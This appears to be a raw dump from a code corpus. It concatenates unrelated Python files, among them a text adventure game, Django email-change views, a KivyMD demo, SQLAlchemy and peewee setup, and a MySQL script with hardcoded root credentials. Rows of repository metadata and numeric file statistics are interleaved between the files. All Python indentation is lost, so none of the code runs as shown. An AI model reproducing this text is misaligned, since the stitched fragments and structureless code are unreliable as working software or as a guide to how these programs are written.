out_data = {}
if forecast_obj.current_weather_data:
out_data.update(forecast_obj.current_weather_data)
if forecast_obj.current_air_pollution_data:
out_data.update(forecast_obj.current_air_pollution_data)
return Response(data=out_data, status=status.HTTP_200_OK)
else:
return Response(data={}, status=status.HTTP_404_NOT_FOUND)
| 39.83871 | 72 | 0.756275 | 143 | 1,235 | 6.244755 | 0.461538 | 0.073908 | 0.095185 | 0.038074 | 0.179171 | 0.129899 | 0.078387 | 0 | 0 | 0 | 0 | 0.005935 | 0.181377 | 1,235 | 30 | 73 | 41.166667 | 0.877349 | 0 | 0 | 0 | 0 | 0 | 0.017814 | 0.017814 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.307692 | 0 | 0.653846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
b3c50cc00310efefd9a39ed3a9611d6fb57a4cf5 | 11,149 | py | Python | pycode2/ex43.py | v-sukt/misc_code | ac5ea0a55a070c88c410d14511c25d332fc675d5 | [
"Apache-2.0"
] | null | null | null | pycode2/ex43.py | v-sukt/misc_code | ac5ea0a55a070c88c410d14511c25d332fc675d5 | [
"Apache-2.0"
] | null | null | null | pycode2/ex43.py | v-sukt/misc_code | ac5ea0a55a070c88c410d14511c25d332fc675d5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2.7
""" Guidelines for Object Oriented Analysis and Design:
1. Write down about the problem
2. Extract Key cnocepts from #1 and reseach them
3. Create a class hierarchy and object map for the concepts - in object has-a is-a fastion
4. Code the classes and a test to run them
5. Repeat and refine iti
It's all like form a very abstract idea and then solidify it further.
Now draw some diagrams depicting the relationship between various things and write description of these things.
- once it's perfect (covers all things needed) separate the nouns and verbs from it (classes/objects and methods).
- ensure that you fully understand it and can visualize it, if not do some research on them and undestand
- get some rough common relations between nouns and how others can be related to each other || a basic hierarchy for classes
- check which of these names are similar things?
* like same thing - for class and instance of it "
* What is basically just another word for another thing?"
- create a basic structure and some code - test that it works
- keep on adding some code and testing it's working, repeat and refine
The mehod used earlier is called top-down method where at top it's just abstract and towards bottom gets more solofied.
There is another way which one can use as one become good at programming and there is some part of this bug puzzle known to you
and can think the problem in terms of code. Some steps for this way (Bottom Up):
1. Take a small piece of the problem; hack on some code and get it to run barely.
2. Refine the code into something more formal with classes and automated tests.
3. Extract the key concepts you're using and try to find research for them.
4. Write up a description of what's really going on.
5. Go back and refine the code, possibly throwing it out and starting over.
6. Repeat, moving on to some other piece of the problem.
Remember that your solution will probably be meandering and weird, so that's why Zed's version of this process involves going
back and finding research then cleaning things up based on what you've learned.
"""
from sys import exit
from random import randint
class Scene(object):
def enter(self):
print "This scene is not yet cofigured. Subclass it and implement enter()"
exit(1)
class Engine(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
while True:
print "\n------------"
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
class Death(Scene):
quips = [ "You dead. You kinda suck a this.",
"Your mom would be proud...if she were smarter",
"Such a luser.",
"I've a small puppy that's better at this."
]
def enter(self):
print Death.quips[randint(0, len(self.quips)-1)]
exit(1)
class CentralCorridor(Scene):
def enter(self):
print "The Gothons of Planet Percal #25 have invaded your ship and destroyed"
print "your entire crew. You are the last surviving member and your last"
print "mission is to get the neutron destruct bomb from the Weapons Armory,"
print "put it in the bridge, and blow the ship up after getting into an "
print "escape pod.\n"
print "You're running down the central corridor to the Weapons Armory when"
print "a Gothon jumps out, red scaly skin, dark grimy teeth, and evil clown costume"
print "flowing around his hate filled body. He's blocking the door to the"
print "Armory and about to pull a weapon to blast you."
action = raw_input("(shoot!/dodge!/tell a joke)> ")
if action == "shoot!":
print "Quick on the draw you yank out your blaster and fire it at the Gothon."
print "His clown costume is flowing and moving around his body, which throws"
print "off your aim. Your laser hits his costume but misses him entirely. This"
print "completely ruins his brand new costume his mother bought him, which"
print "makes him fly into a rage and blast you repeatedly in the face until"
print "you are dead. Then he eats you."
return 'death'
elif action == "dodge!":
print "Like a world class boxer you dodge, weave, slip and slide right"
print "as the Gothon's blaster cranks a laser past your head."
print "In the middle of your artful dodge your foot slips and you"
print "bang your head on the metal wall and pass out."
print "You wake up shortly after only to die as the Gothon stomps on"
print "your head and eats you."
return 'death'
elif action == "tell a joke":
print "Lucky for you they made you learn Gothon insults in the academy."
print "You tell the one Gothon joke you know:"
print "Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr, fur fvgf nebhaq gur ubhfr."
print "The Gothon stops, tries not to laugh, then busts out laughing and can't move."
print "While he's laughing you run up and shoot him square in the head"
print "putting him down, then jump through the Weapon Armory door."
return 'laser_weapon_armory'
else:
print "DOES NOT COMPUTE!"
return 'central_corridor'
class LaserWeaponArmory(Scene):
def enter(sef):
print "You do a dive roll into the Weapon Armory, crouch and scan the room"
print "for more Gothons that might be hiding. It's dead quiet, too quiet."
print "You stand up and run to the far side of the room and find the"
print "neutron bomb in its container. There's a keypad lock on the box"
print "and you need the code to get the bomb out. If you get the code"
print "wrong 10 times then the lock closes forever and you can't"
print "get the bomb. The code is 3 digits."
code = "%d%d%d" % (randint(1,9),randint(1,9),randint(1,9))
try: # cheat code - just type two nos rather than one
guess = int(raw_input("[keypad]> "))
guesses = 0
while guess != code and guesses < 10:
print "BZZZZEDDD!"
guesses += 1
guess = int(raw_input("[keypad]> ")) # The bug in the game - there is no escape unless you compare integer with integer
except ValueError:
guess = code
if guess == code:
print "The container clicks open and the seal breaks, letting gas out."
print "You grab the neutron bomb and run as fast as you can to the"
print "bridge where you must place it in the right spot."
return 'the_bridge'
else:
print "The lock buzzes one last time and then you hear a sickening"
print "melting sound as the mechanism is fused together."
print "You decide to sit there, and finally the Gothons blow up the"
print "ship from their ship and you die."
return 'death'
exit(0)
class TheBridge(Scene):
def enter(self):
print "You burst onto the Bridge with the neutron destruct bomb"
print "under your arm and surprise 5 Gothons who are trying to"
print "take control of the ship. Each of them has an even uglier"
print "clown costume than the last. They haven't pulled their"
print "weapons out yet, as they see the active bomb under your"
print "arm and don't want to set it off."
action = raw_input("(throw the bomb/slowly place the bomb/something else)> ")
if action == "throw the bomb":
print "In a panic you throw the bomb at the group of Gothons"
print "and make a leap for the door. Right as you drop it a"
print "Gothon shoots you right in the back killing you."
print "As you die you see another Gothon frantically try to disarm"
print "the bomb. You die knowing they will probably blow up when"
print "it goes off."
return 'death'
elif action == "slowly place the bomb":
print "You point your blaster at the bomb under your arm"
print "and the Gothons put their hands up and start to sweat."
print "You inch backward to the door, open it, and then carefully"
print "place the bomb on the floor, pointing your blaster at it."
print "You then jump back through the door, punch the close button"
print "and blast the lock so the Gothons can't get out."
print "Now that the bomb is placed you run to the escape pod to"
print "get off this tin can."
return 'escape_pod'
else:
print "DOES NOT COMPUTE!"
return "the_bridge"
class EscapePod(Scene):
def enter(self):
print "You rush through the ship desperately trying to make it to"
print "the escape pod before the whole ship explodes. It seems like"
print "hardly any Gothons are on the ship, so your run is clear of"
print "interference. You get to the chamber with the escape pods, and"
print "now need to pick one to take. Some of them could be damaged"
print "but you don't have time to look. There's 5 pods, which one"
print "do you take?"
good_pod = randint(1,5)
try: # cheat code - just type two nos rather than one
guess = int(raw_input("[pod #]> ")) # The bug in the game - there is no escape unless you compare integer with integer
except:
guess = good_pod
if int(guess) != good_pod:
print "You jump into pod %s and hit the eject button" % guess
print "The pod escapes out into the void of space, then"
print "implodes as the hull ruptures, crushing your body"
print "into jam jelly."
return 'death'
else:
print "You jump into pod %s and hit the eject button." % guess
print "The pod easily slides out into space heading to"
print "the planet below. As it flies to the planet, you look"
print "back and see your ship implode then explode like a"
print "bright star, taking out the Gothon ship at the same"
print "time. You won!"
return 'finished'
class Map(object):
scenes = {
'central_corridor' : CentralCorridor(),
'laser_weapon_armory' : LaserWeaponArmory(),
'the_bridge' : TheBridge(),
'escape_pod' : EscapePod(),
'death' : Death()
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
return Map.scenes.get(scene_name)
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map("central_corridor")
a_game = Engine(a_map)
a_game.play() | 46.454167 | 135 | 0.647771 | 1,704 | 11,149 | 4.205986 | 0.314554 | 0.016743 | 0.008372 | 0.01186 | 0.096693 | 0.077159 | 0.050509 | 0.050509 | 0.050509 | 0.050509 | 0 | 0.004803 | 0.29034 | 11,149 | 240 | 136 | 46.454167 | 0.901036 | 0.025025 | 0 | 0.130178 | 0 | 0 | 0.546067 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.005917 | 0.011834 | null | null | 0.497041 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
b3d5c451d19cad58cf067b19b358900f24263b22 | 283 | py | Python | schumt/criterion/__init__.py | Schureed/SchuMT | f4438c26243a6e736a71f376a0e186ba7c01f130 | [
"Unlicense"
] | null | null | null | schumt/criterion/__init__.py | Schureed/SchuMT | f4438c26243a6e736a71f376a0e186ba7c01f130 | [
"Unlicense"
] | null | null | null | schumt/criterion/__init__.py | Schureed/SchuMT | f4438c26243a6e736a71f376a0e186ba7c01f130 | [
"Unlicense"
] | null | null | null | import importlib
import os
import schumt.builder
builder = schumt.builder.Builder()
for _filename in os.listdir(os.path.dirname(__file__)):
if not _filename.endswith('.py') or '__' in _filename:
continue
importlib.import_module(__package__ + '.' + _filename[:-3])
| 23.583333 | 63 | 0.717314 | 35 | 283 | 5.371429 | 0.6 | 0.159574 | 0.212766 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004202 | 0.159011 | 283 | 11 | 64 | 25.727273 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0.021201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
b60262f3bc9e43c9ceff274eda24792109e04191 | 1,242 | py | Python | demos/kitchen_sink/studies/shrine/shrine.py | ibrahimcetin/KivyMD | b8b718f24ce8d7dc90b78ea62574e208ef32776a | [
"MIT"
] | 1 | 2020-10-03T04:30:59.000Z | 2020-10-03T04:30:59.000Z | demos/kitchen_sink/studies/shrine/shrine.py | ibrahimcetin/KivyMD | b8b718f24ce8d7dc90b78ea62574e208ef32776a | [
"MIT"
] | null | null | null | demos/kitchen_sink/studies/shrine/shrine.py | ibrahimcetin/KivyMD | b8b718f24ce8d7dc90b78ea62574e208ef32776a | [
"MIT"
] | 1 | 2020-10-19T21:18:43.000Z | 2020-10-19T21:18:43.000Z | """
MDShrine demo
=============
.. seealso::
`Material Design spec, Shrine <https://material.io/design/material-studies/shrine.html#>`
Shrine is a retail app that uses Material Design components
and Material Theming to express branding for a variety of fashion and lifestyle items.
"""
import os
from kivy.lang import Builder
from kivy.properties import StringProperty
from kivy.uix.screenmanager import ScreenManager
from kivymd.theming import ThemableBehavior
Builder.load_string(
"""
#:import FadeTransition kivy.uix.screenmanager.FadeTransition
#:import ShrineRegisterScreen studies.shrine.baseclass.register_screen.ShrineRegisterScreen
#:import ShrineRootScreen studies.shrine.baseclass.shrine_root_screen.ShrineRootScreen
<MDShrine>
transition: FadeTransition()
ShrineRegisterScreen:
title: root.title
ShrineRootScreen:
title: root.title
"""
)
KV_DIR = f"{os.path.dirname(__file__)}/kv"
for kv_file in os.listdir(KV_DIR):
with open(os.path.join(KV_DIR, kv_file), encoding="utf-8") as kv:
Builder.load_string(kv.read())
class MDShrine(ThemableBehavior, ScreenManager):
title = StringProperty("SHRINE")
def __init__(self, **kwargs):
super().__init__(**kwargs)
| 24.84 | 92 | 0.747182 | 148 | 1,242 | 6.121622 | 0.5 | 0.043046 | 0.04415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00094 | 0.143317 | 1,242 | 49 | 93 | 25.346939 | 0.850564 | 0.227858 | 0 | 0 | 0 | 0 | 0.073874 | 0.054054 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
3739e12e57043c6c3a410e59b83e85212fd9c9aa | 240 | py | Python | 6.00.1x/MidTerm Quiz/P6Flatten.py | MErmanProject/My-Projects | ca393b71ea8537f21a28dc6ca1558da27bcaa907 | [
"CC0-1.0"
] | null | null | null | 6.00.1x/MidTerm Quiz/P6Flatten.py | MErmanProject/My-Projects | ca393b71ea8537f21a28dc6ca1558da27bcaa907 | [
"CC0-1.0"
] | null | null | null | 6.00.1x/MidTerm Quiz/P6Flatten.py | MErmanProject/My-Projects | ca393b71ea8537f21a28dc6ca1558da27bcaa907 | [
"CC0-1.0"
] | null | null | null | def flatten(aList):
myList = []
for el in aList:
if isinstance(el, list) or isinstance(el, tuple):
myList.extend(flatten(el))
else:
myList.append(el)
return myList
| 26.666667 | 60 | 0.504167 | 26 | 240 | 4.653846 | 0.615385 | 0.198347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4 | 240 | 8 | 61 | 30 | 0.840278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
376c345eb31698469708d64bc5b16f95f11dbfbe | 3,033 | py | Python | verified_email_change/views.py | fusionbox/django-verified-email-change | fb4b08eb6d1a419ed73409aa33b39a04779e773a | [
"BSD-2-Clause"
] | 1 | 2019-11-04T20:52:37.000Z | 2019-11-04T20:52:37.000Z | verified_email_change/views.py | fusionbox/django-verified-email-change | fb4b08eb6d1a419ed73409aa33b39a04779e773a | [
"BSD-2-Clause"
] | null | null | null | verified_email_change/views.py | fusionbox/django-verified-email-change | fb4b08eb6d1a419ed73409aa33b39a04779e773a | [
"BSD-2-Clause"
] | 1 | 2017-09-16T03:03:06.000Z | 2017-09-16T03:03:06.000Z | from django.views.generic import FormView, UpdateView
from django.db import transaction
from django.contrib import messages
from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
from django.conf import settings
from django.shortcuts import resolve_url
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from decoratormixins.auth import LoginRequiredMixin
from .forms import ChangeEmailForm, ChangeEmailCheckPasswordForm
from .signals import email_changed
from . import initiate_email_change, get_email_change_data
User = get_user_model()
class SuccessUrlMixin(object):
def get_success_url(self):
return resolve_url(settings.LOGIN_REDIRECT_URL)
class ChangeEmailView(LoginRequiredMixin, SuccessUrlMixin, FormView):
form_class = ChangeEmailCheckPasswordForm
template_name = 'verified_email_change/change_email.html'
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
# If we pass self.request.user to the form, the form will update it when calling
# form.is_valid(). This will mess up the signed_data computation in View.form_valid().
# This is why we need a copy of self.request.user:
kwargs['instance'] = User.objects.get(pk=self.request.user.pk)
return kwargs
@transaction.atomic
def form_valid(self, form):
new_email = form.cleaned_data['email']
initiate_email_change(self.request.user, new_email)
messages.success(self.request, _("A confirmation email has been sent to {}.").format(
new_email
))
return super().form_valid(form)
class ChangeEmailConfirmView(SuccessUrlMixin, UpdateView):
template_name = 'verified_email_change/change_email_confirm.html'
form_class = ChangeEmailForm
def get_form_kwargs(self):
kwargs = {
'instance': self.object,
'initial': self.get_initial(),
'prefix': self.get_prefix(),
'data': {'email': self.data['email']},
}
return kwargs
@cached_property
def data(self):
return get_email_change_data(self.kwargs['signed_data'])
def get_object(self):
# Raise a 404 if the user already changed its email address
return get_object_or_404(User, pk=self.data['pk'], email=self.data['old_email'])
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['data'] = self.data
return context
def form_valid(self, form):
email_changed.send(
sender=self,
user=self.object,
new_email=self.data['email'],
old_email=self.data['old_email'],
request=self.request,
)
# TODO: what should be done if request.user != object.user?
messages.success(self.request, _("Your email address has been changed to {}.").format(
self.data['email']
))
return super().form_valid(form)
| 35.267442 | 94 | 0.691065 | 380 | 3,033 | 5.323684 | 0.292105 | 0.044488 | 0.029659 | 0.024716 | 0.136431 | 0.095897 | 0.041522 | 0 | 0 | 0 | 0 | 0.003788 | 0.216617 | 3,033 | 85 | 95 | 35.682353 | 0.847643 | 0.108144 | 0 | 0.15625 | 0 | 0 | 0.097073 | 0.031864 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.125 | false | 0.03125 | 0.203125 | 0.046875 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
376f670e1b8f00ad55925305051637b057fa3ff7 | 359 | py | Python | backend/app/db.py | s-bose/offline-password-manager | 85b5478d70bb51c2364d0d207cf66f8a11782623 | [
"MIT"
] | null | null | null | backend/app/db.py | s-bose/offline-password-manager | 85b5478d70bb51c2364d0d207cf66f8a11782623 | [
"MIT"
] | null | null | null | backend/app/db.py | s-bose/offline-password-manager | 85b5478d70bb51c2364d0d207cf66f8a11782623 | [
"MIT"
] | null | null | null | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from app.core.config import DATABASE_URL
engine = create_engine(DATABASE_URL) # database engine
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
Base = declarative_base() # sqlalchemy Base class
| 35.9 | 75 | 0.835655 | 45 | 359 | 6.533333 | 0.466667 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10585 | 359 | 9 | 76 | 39.888889 | 0.915888 | 0.103064 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.571429 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
3797bf049c28b8a4dcb96d0451d19e810f024303 | 280 | py | Python | setup.py | jallen13/google_auth | 82649e31d9ab30ab8decd2b58f4e319dc2b17ae5 | [
"MIT"
] | null | null | null | setup.py | jallen13/google_auth | 82649e31d9ab30ab8decd2b58f4e319dc2b17ae5 | [
"MIT"
] | null | null | null | setup.py | jallen13/google_auth | 82649e31d9ab30ab8decd2b58f4e319dc2b17ae5 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(name='google-api-auth',
version='0.1.0',
description = 'Google APIs authentication',
author = 'John Allen',
url = 'https://github.com/jallen13/google-api-auth.git',
packages = find_packages()
)
| 31.111111 | 62 | 0.65 | 34 | 280 | 5.294118 | 0.735294 | 0.133333 | 0.144444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022624 | 0.210714 | 280 | 8 | 63 | 35 | 0.791855 | 0 | 0 | 0 | 0 | 0 | 0.367857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
37989f1ff5783f7a7a43a7d7de2d3393d35737b5 | 909 | py | Python | src/mapping/database.py | makerere-compute/cropsurveillance | 0d15e98cb92efdd6e19cf7ad840a4fd88e834d6e | [
"CC-BY-3.0"
] | 4 | 2015-01-09T18:47:12.000Z | 2018-11-09T17:29:00.000Z | src/mapping/database.py | makerere-compute/cropsurveillance | 0d15e98cb92efdd6e19cf7ad840a4fd88e834d6e | [
"CC-BY-3.0"
] | null | null | null | src/mapping/database.py | makerere-compute/cropsurveillance | 0d15e98cb92efdd6e19cf7ad840a4fd88e834d6e | [
"CC-BY-3.0"
] | null | null | null | #this script is for saving data to the mysql database
import MySQLdb
#create a connection to the datase
conn = MySQLdb.connect (host = "localhost",
user = "root",
passwd = "root",
db = "cropsurveillance")
cursor = conn.cursor ()
cursor.execute ("SELECT VERSION()")
row = cursor.fetchone ()
#print server version
print "server version:", row[0]
#this function save data to the database
def savetile(zoomlevel,tile_lon_ul,tile_lat_ul,tile_lon_lr,tile_lat_lr,tile_blob):
sql = "INSERT INTO imagetiles (zoom,tile_lon_ul,tile_lat_ul,tile_lon_lr,tile_lat_lr,tile_blob) VALUES (%s,%s,%s,%s,%s,%s)"
cursor.execute(sql, (zoomlevel,tile_lon_ul,tile_lat_ul,tile_lon_lr,tile_lat_lr,tile_blob))
print "inserted"
def closeCursor():
cursor.close()
#close the connection to the database
def closeConnection():
conn.close()
| 37.875 | 126 | 0.684268 | 131 | 909 | 4.541985 | 0.427481 | 0.070588 | 0.020168 | 0.065546 | 0.262185 | 0.252101 | 0.252101 | 0.252101 | 0.252101 | 0.252101 | 0 | 0.001383 | 0.20462 | 909 | 23 | 127 | 39.521739 | 0.821577 | 0.19802 | 0 | 0 | 0 | 0.058824 | 0.256906 | 0.088398 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.058824 | 0.058824 | null | null | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
37affdcf85d08d1a85b7605e0de7eb84243b2279 | 334 | py | Python | conftest.py | tetsuzawa/dxx-py | 8c63327b8814bdd3499c1696b5a5f0eb9fe7fc76 | [
"MIT"
] | null | null | null | conftest.py | tetsuzawa/dxx-py | 8c63327b8814bdd3499c1696b5a5f0eb9fe7fc76 | [
"MIT"
] | null | null | null | conftest.py | tetsuzawa/dxx-py | 8c63327b8814bdd3499c1696b5a5f0eb9fe7fc76 | [
"MIT"
] | null | null | null | import pytest
import os
import numpy as np
import dxx
@pytest.fixture(scope="module")
def mock_data_file() -> str:
mock_file_name = "mock.DSB"
sampling_freq = 48000
mock_data = np.arange(5 * sampling_freq, dtype=np.int16)
dxx.write(mock_file_name, mock_data)
yield mock_file_name
os.remove(mock_file_name)
| 19.647059 | 60 | 0.724551 | 53 | 334 | 4.301887 | 0.509434 | 0.140351 | 0.210526 | 0.140351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029197 | 0.179641 | 334 | 16 | 61 | 20.875 | 0.80292 | 0 | 0 | 0 | 0 | 0 | 0.041916 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.333333 | 0 | 0.416667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
37c76b67f2a2e641db79f29db294b819d3490024 | 449 | py | Python | stubs/m5stack_flowui-1_4_0-beta/flowlib/lib/emoji.py | RonaldHiemstra/micropython-stubs | d97f879b01f6687baaebef1c7e26a80909c3cff3 | [
"MIT"
] | 38 | 2020-10-18T21:59:44.000Z | 2022-03-17T03:03:28.000Z | stubs/m5stack_flowui-1_4_0-beta/flowlib/lib/emoji.py | RonaldHiemstra/micropython-stubs | d97f879b01f6687baaebef1c7e26a80909c3cff3 | [
"MIT"
] | 176 | 2020-10-18T14:31:03.000Z | 2022-03-30T23:22:39.000Z | stubs/m5stack_flowui-1_4_0-beta/flowlib/lib/emoji.py | RonaldHiemstra/micropython-stubs | d97f879b01f6687baaebef1c7e26a80909c3cff3 | [
"MIT"
] | 6 | 2020-12-28T21:11:12.000Z | 2022-02-06T04:07:50.000Z | """
Module: 'flowlib.lib.emoji' on M5 FlowUI v1.4.0-beta
"""
# MCU: (sysname='esp32', nodename='esp32', release='1.11.0', version='v1.11-284-g5d8e1c867 on 2019-08-30', machine='ESP32 module with ESP32')
# Stubber: 1.3.1
class Emoji:
''
def clear():
pass
def draw_square():
pass
def show_love():
pass
def show_map():
pass
def show_normal():
pass
lcd = None
def sleep():
pass
| 16.035714 | 141 | 0.572383 | 64 | 449 | 3.953125 | 0.640625 | 0.110672 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119266 | 0.271715 | 449 | 27 | 142 | 16.62963 | 0.654434 | 0.463252 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0.4 | 0 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
8071919e1aa95195ef61c58834f2f2d4ada4535d | 258 | py | Python | examples/microblogging/init_db.py | half-cambodian-hacker-man/lustre | 93e2196a962cafcfd7fa0be93a6b0d563c46ba75 | [
"MIT"
] | 3 | 2020-09-06T02:21:09.000Z | 2020-09-30T00:05:54.000Z | examples/microblogging/init_db.py | videogame-hacker/lustre | 93e2196a962cafcfd7fa0be93a6b0d563c46ba75 | [
"MIT"
] | null | null | null | examples/microblogging/init_db.py | videogame-hacker/lustre | 93e2196a962cafcfd7fa0be93a6b0d563c46ba75 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from run_dev import random_secret_key
random_secret_key()
from microblogging import app, DATABASE_URL
from sqlalchemy import create_engine
if __name__ == "__main__":
app.db.metadata.create_all(create_engine(str(DATABASE_URL)))
| 21.5 | 64 | 0.802326 | 38 | 258 | 4.973684 | 0.657895 | 0.126984 | 0.15873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004367 | 0.112403 | 258 | 11 | 65 | 23.454545 | 0.820961 | 0.081395 | 0 | 0 | 0 | 0 | 0.033898 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
8073b4266438788859aadc127c07d0e44167bfe7 | 408 | py | Python | spotify_dl/models.py | kaiulr/spotify1-dl | 3d2e3c33f2c697c4a936f8c0a89a04564bca0c74 | [
"MIT"
] | 1 | 2021-03-30T06:29:18.000Z | 2021-03-30T06:29:18.000Z | spotify_dl/models.py | tonyd33/spotify-dl | f453ad8e9ab3de45064045bfb8e7ae46434e31eb | [
"MIT"
] | null | null | null | spotify_dl/models.py | tonyd33/spotify-dl | f453ad8e9ab3de45064045bfb8e7ae46434e31eb | [
"MIT"
] | null | null | null | from peewee import SqliteDatabase
from peewee import Model, TextField
from os import path
from pathlib import Path
from spotify_dl.constants import SAVE_PATH
Path(path.expanduser(SAVE_PATH)).mkdir(exist_ok=True)
db = SqliteDatabase(path.expanduser(f"{SAVE_PATH}/songs.db"))
class Song(Model):
search_term = TextField()
video_id = TextField()
class Meta:
database = db
